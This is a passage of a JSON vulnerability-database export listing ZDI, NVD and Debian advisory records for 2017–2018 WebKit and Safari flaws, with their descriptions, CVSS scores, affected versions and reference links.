vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of HTMLButtonElement objects. By performing actions in JavaScript, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari HTMLButtonElement Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7165"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-152", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-152/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:54:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of arguments to JavaScript functions. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari FTL JIT Integer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7160"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-150", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-150/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:24:12", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13885", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13885"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-13885", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13885", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T13:24:13", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13884", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-13884", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13884", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:33:48", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted web site that sends a 401 Unauthorized redirect.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7153", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7153"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-7153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7153", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:33:52", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7165", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7165"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-7165", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7165", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:33:49", "description": "An issue was discovered in certain Apple products. Safari before 11.0.2 is affected. The issue involves the \"WebKit Web Inspector\" component. It allows remote attackers to execute arbitrary code via special characters that trigger command injection.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7161", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7161"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-7161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:34:04", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "type": "cve", "title": "CVE-2017-7160", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7160"], "modified": "2019-03-22T19:20:00", "cpe": ["cpe:/a:apple:webkit:-", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-7160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T17:25:39", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. macOS before 10.13.3 is affected. Safari before 11.0.3 is affected. tvOS before 11.2.5 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2018-4089", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4089"], "modified": "2018-04-27T17:40:00", "cpe": [], "id": "CVE-2018-4089", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4089", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T17:25:32", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. macOS before 10.13.3 is affected. Safari before 11.0.3 is affected. iCloud before 7.3 on Windows is affected. iTunes before 12.7.3 on Windows is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2018-4088", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4088"], "modified": "2018-04-27T17:50:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "CVE-2018-4088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4088", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T17:27:07", "description": "An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. macOS before 10.13.3 is affected. Safari before 11.0.3 is affected. iCloud before 7.3 on Windows is affected. iTunes before 12.7.3 on Windows is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2018-4096", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4096"], "modified": "2018-04-27T17:48:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "CVE-2018-4096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}], "debiancve": [{"lastseen": "2022-07-06T18:06:20", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2017-13885", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13885"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2017-13885", "href": "https://security-tracker.debian.org/tracker/CVE-2017-13885", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:20", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2017-13884", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2017-13884", "href": "https://security-tracker.debian.org/tracker/CVE-2017-13884", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted web site that sends a 401 Unauthorized redirect.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2017-7153", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7153"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2017-7153", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7153", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2017-7165", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7165"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2017-7165", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7165", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T18:06:21", "description": "An issue was discovered in certain Apple products. Safari before 11.0.2 is affected. The issue involves the \"WebKit Web Inspector\" component. It allows remote attackers to execute arbitrary code via special characters that trigger command injection.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2017-7161", "bulletinFamily": "info", "cvss2": {"severity": 